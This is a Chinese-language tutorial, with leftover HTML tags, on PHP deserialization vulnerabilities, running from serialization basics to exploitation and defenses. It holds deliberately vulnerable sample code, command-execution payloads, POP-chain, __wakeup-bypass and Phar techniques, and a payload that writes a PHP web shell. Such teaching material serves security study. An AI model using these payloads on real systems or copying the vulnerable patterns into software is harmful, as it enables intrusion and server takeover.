PHP反序列化漏洞从0到1全面指南<\/h1>

一、PHP类和对象基础<\/h2>

1. 基本概念<\/h3>

类<\/strong>：对一类事物的抽象概念（如"汽车"）<\/li>
对象<\/strong>：类的具体实例（如"我的宝马"）<\/li>

创建类：使用class<\/code>关键字<\/li> <\/ul> class<\/span> Car<\/span> { <\/span><\/span> \/\/ 类内容 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>2. 类成员<\/h3> 成员属性<\/strong>：类中定义的变量<\/li> 方法<\/strong>：类中定义的函数<\/li> 成员常量<\/strong><\/li> <\/ul> 3. 访问权限<\/h3> 权限<\/th> 说明<\/th> 外部访问<\/th> 类内部访问<\/th> 被继承<\/th> <\/tr> <\/thead> public<\/td> 公有<\/td> √<\/td> √<\/td> √<\/td> <\/tr> protected<\/td> 受保护<\/td> ×<\/td> √<\/td> √<\/td> <\/tr> private<\/td> 私有<\/td> ×<\/td> √<\/td> ×<\/td> <\/tr> <\/tbody> <\/table> 二、PHP魔术方法<\/h2> 1. 常用魔术方法<\/h3> 方法<\/th> 触发条件<\/th> 参数<\/th> 说明<\/th> <\/tr> <\/thead> __construct()<\/code><\/td> 实例化时<\/td> 任意<\/td> 构造函数<\/td> <\/tr> __destruct()<\/code><\/td> 对象销毁时<\/td> 无<\/td> 析构函数<\/td> <\/tr> __wakeup()<\/code><\/td> 反序列化前<\/td> 无<\/td> 反序列化预处理<\/td> <\/tr> __sleep()<\/code><\/td> 序列化前<\/td> 无<\/td> 返回需序列化的属性数组<\/td> <\/tr> __toString()<\/code><\/td> 对象被当作字符串<\/td> 无<\/td> 需有返回值<\/td> <\/tr> __invoke()<\/code><\/td> 对象被当作函数<\/td> 无<\/td> 对象函数式调用<\/td> <\/tr> __get()<\/code><\/td> 访问不可见属性<\/td> 属性名<\/td> 属性不存在\/不可访问<\/td> <\/tr> __set()<\/code><\/td> 设置不可见属性<\/td> 属性名,值<\/td> 属性不存在\/不可访问<\/td> <\/tr> __call()<\/code><\/td> 调用不存在方法<\/td> 方法名,参数数组<\/td> 方法不存在<\/td> <\/tr> __callStatic()<\/code><\/td> 调用不存在静态方法<\/td> 方法名,参数数组<\/td> 静态方法不存在<\/td> <\/tr> <\/tbody> <\/table> 三、序列化与反序列化<\/h2> 1. 序列化格式<\/h3> O<\/span>:<\/span>4<\/span>:<\/span>"Demo"<\/span>:<\/span>3<\/span>:<\/span>{s<\/span>:<\/span>4<\/span>:<\/span>"name"<\/span>;s<\/span>:<\/span>5<\/span>:<\/span>"x1ong"<\/span>;s<\/span>:<\/span>3<\/span>:<\/span>"age"<\/span>;i<\/span>:<\/span>18<\/span>;s<\/span>:<\/span>7<\/span>:<\/span>"address"<\/span>;s<\/span>:<\/span>2<\/span>:<\/span>"HN"<\/span>;} <\/span><\/span><\/code><\/pre> O<\/code>：对象<\/li> 4<\/code>：类名长度<\/li> "Demo"<\/code>：类名<\/li> 3<\/code>：属性数量<\/li> {}<\/code>：属性键值对<\/li> <\/ul> 2. 不同访问权限的序列化表现<\/h3> public<\/strong>：属性名不变<\/li> protected<\/strong>：属性名前加\x00*\x00<\/code><\/li> private<\/strong>：属性名前加\x00类名\x00<\/code><\/li> <\/ul> 3. 反序列化漏洞原理<\/h3> 当反序列化字符串可控且未过滤时，可反序列化任意类对象，控制其属性值，进而执行危险操作。<\/p> 四、漏洞利用技巧<\/h2> 1. 基本利用步骤<\/h3> 寻找可控的unserialize()<\/code>参数<\/li> 寻找包含__wakeup<\/code>或__destruct<\/code>的目标类<\/li> 分析属性调用链，找到可控属性<\/li> 构造序列化字符串发起攻击<\/li> <\/ol> 2. 示例漏洞代码<\/h3> class<\/span> Execute<\/span> { <\/span><\/span> public<\/span> $cmd; <\/span><\/span> function<\/span> displayInfo<\/span>() { <\/span><\/span> eval<\/span>($this-><\/span>cmd<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>$obj =<\/span> unserialize<\/span>($_GET['word'<\/span>]); <\/span><\/span>$obj-><\/span>displayInfo<\/span>(); <\/span><\/span><\/code><\/pre>3. 构造EXP<\/h3> class<\/span> Execute<\/span> { <\/span><\/span> public<\/span> $cmd =<\/span> "system('whoami');"<\/span>; <\/span><\/span>} <\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> Execute<\/span>); <\/span><\/span>\/\/ O:7:"Execute":1:{s:3:"cmd";s:17:"system('whoami');";} <\/span><\/span><\/span><\/code><\/pre>五、高级利用技术<\/h2> 1. POP链构造<\/h3> 通过魔术方法多次跳转调用危险方法：<\/p> class<\/span> A<\/span> { <\/span><\/span> function<\/span> __destruct() { <\/span><\/span> $this-><\/span>obj<\/span>-><\/span>action<\/span>(); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>class<\/span> B<\/span> { <\/span><\/span> function<\/span> action<\/span>() { <\/span><\/span> system<\/span>($this-><\/span>cmd<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>\/\/ 构造链：A->B <\/span><\/span><\/span><\/code><\/pre>2. 字符逃逸<\/h3> 通过不等长字符串替换造成序列化数据错乱：<\/p> 长到短<\/strong>：\0\0\0<\/code>(6位) → \0*\0<\/code>(3位)<\/li> 短到长<\/strong>：\0*\0<\/code>(3位) → \0\0\0<\/code>(6位)<\/li> <\/ul> 3. Phar反序列化<\/h3> 利用Phar文件的metadata进行反序列化：<\/p> 构造恶意Phar文件<\/li> 通过文件操作函数触发<\/li> 常用触发函数：file_get_contents()<\/code>、unlink()<\/code>等<\/li> <\/ol> 4. 指针引用<\/h3> 使两个属性值始终相等：<\/p> class<\/span> Flag<\/span> { <\/span><\/span> public<\/span> $t1; <\/span><\/span> public<\/span> $t2; <\/span><\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>t1<\/span> =<\/span> &<\/span>$this-><\/span>t2<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、绕过技术<\/h2> 1. 关键字过滤绕过<\/h3> 使用S<\/code>类型和十六进制编码：<\/p> \/\/ 原始：flag.php <\/span><\/span><\/span>\/\/ 编码后：\66\6c\61\67\2e\70\68\70 <\/span><\/span><\/span><\/span>O<\/span>:<\/span>3<\/span>:<\/span>"BUU"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>4<\/span>:<\/span>"file"<\/span>;S<\/span>:<\/span>8<\/span>:<\/span>"<\/span>\66\6<\/span>c<\/span>\61\67\2<\/span>e<\/span>\70\6<\/span>8<\/span>\70<\/span>"<\/span>;} <\/span><\/span><\/code><\/pre>2. __wakeup<\/code>绕过<\/h3> CVE-2016-7124：当属性数目大于实际数目时<\/p> \/\/ 原始：O:4:"Demo":1:{s:4:"name";s:5:"x1ong";} <\/span><\/span><\/span>\/\/ 绕过：O:4:"Demo":2:{s:4:"name";s:5:"x1ong";} <\/span><\/span><\/span><\/code><\/pre>3. 快速析构<\/h3> 通过畸形序列化字符串提前触发__destruct<\/code>：<\/p> \/\/ 删除闭合}或修改属性数量 <\/span><\/span><\/span><\/span>O<\/span>:<\/span>4<\/span>:<\/span>"Demo"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>4<\/span>:<\/span>"name"<\/span>;s<\/span>:<\/span>5<\/span>:<\/span>"x1ong"<\/span> <\/span><\/span><\/code><\/pre>4. PHP7.1+属性不敏感<\/h3> PHP7.1以上版本对属性权限不敏感，可忽略protected\/private前缀<\/p> 七、防御措施<\/h2> 避免反序列化用户可控数据<\/li> 使用json_encode()<\/code>\/json_decode()<\/code>替代<\/li> 实施严格的输入验证<\/li> 使用签名验证序列化数据<\/li> 限制反序列化类白名单<\/li> <\/ol> 八、实战案例<\/h2> 1. 基础反序列化<\/h3> class<\/span> vul<\/span> { <\/span><\/span> public<\/span> $cmd =<\/span> 'ls'<\/span>; <\/span><\/span> function<\/span> __wakeup() { <\/span><\/span> system<\/span>($this-><\/span>cmd<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>\/\/ EXP: O:3:"vul":1:{s:3:"cmd";s:6:"whoami";} <\/span><\/span><\/span><\/code><\/pre>2. 文件写入<\/h3> class<\/span> vul<\/span> { <\/span><\/span> public<\/span> $filename =<\/span> 'test.txt'<\/span>; <\/span><\/span> public<\/span> $content =<\/span> 'flag'<\/span>; <\/span><\/span> function<\/span> __wakeup() { <\/span><\/span> file_put_contents<\/span>($this-><\/span>filename<\/span>, $this-><\/span>content<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>\/\/ EXP: O:3:"vul":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:28:"<?php eval($_REQUEST[0]);?>";} <\/span><\/span><\/span><\/code><\/pre>3. Phar反序列化<\/h3> $phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>); <\/span><\/span>$phar-><\/span>startBuffering<\/span>(); <\/span><\/span>$phar-><\/span>setStub<\/span>("GIF89a"<\/span>.<\/span>"<?php __HALT_COMPILER(); ?>"<\/span>); <\/span><\/span>$phar-><\/span>setMetadata<\/span>($object); <\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); <\/span><\/span>$phar-><\/span>stopBuffering<\/span>(); <\/span><\/span><\/code><\/pre>通过本指南，您应该已经掌握了PHP反序列化漏洞从基础到高级的全面知识，包括原理、利用技术和防御措施。在实际应用中，请务必遵守法律法规，仅用于授权测试和安全研究目的。<\/p>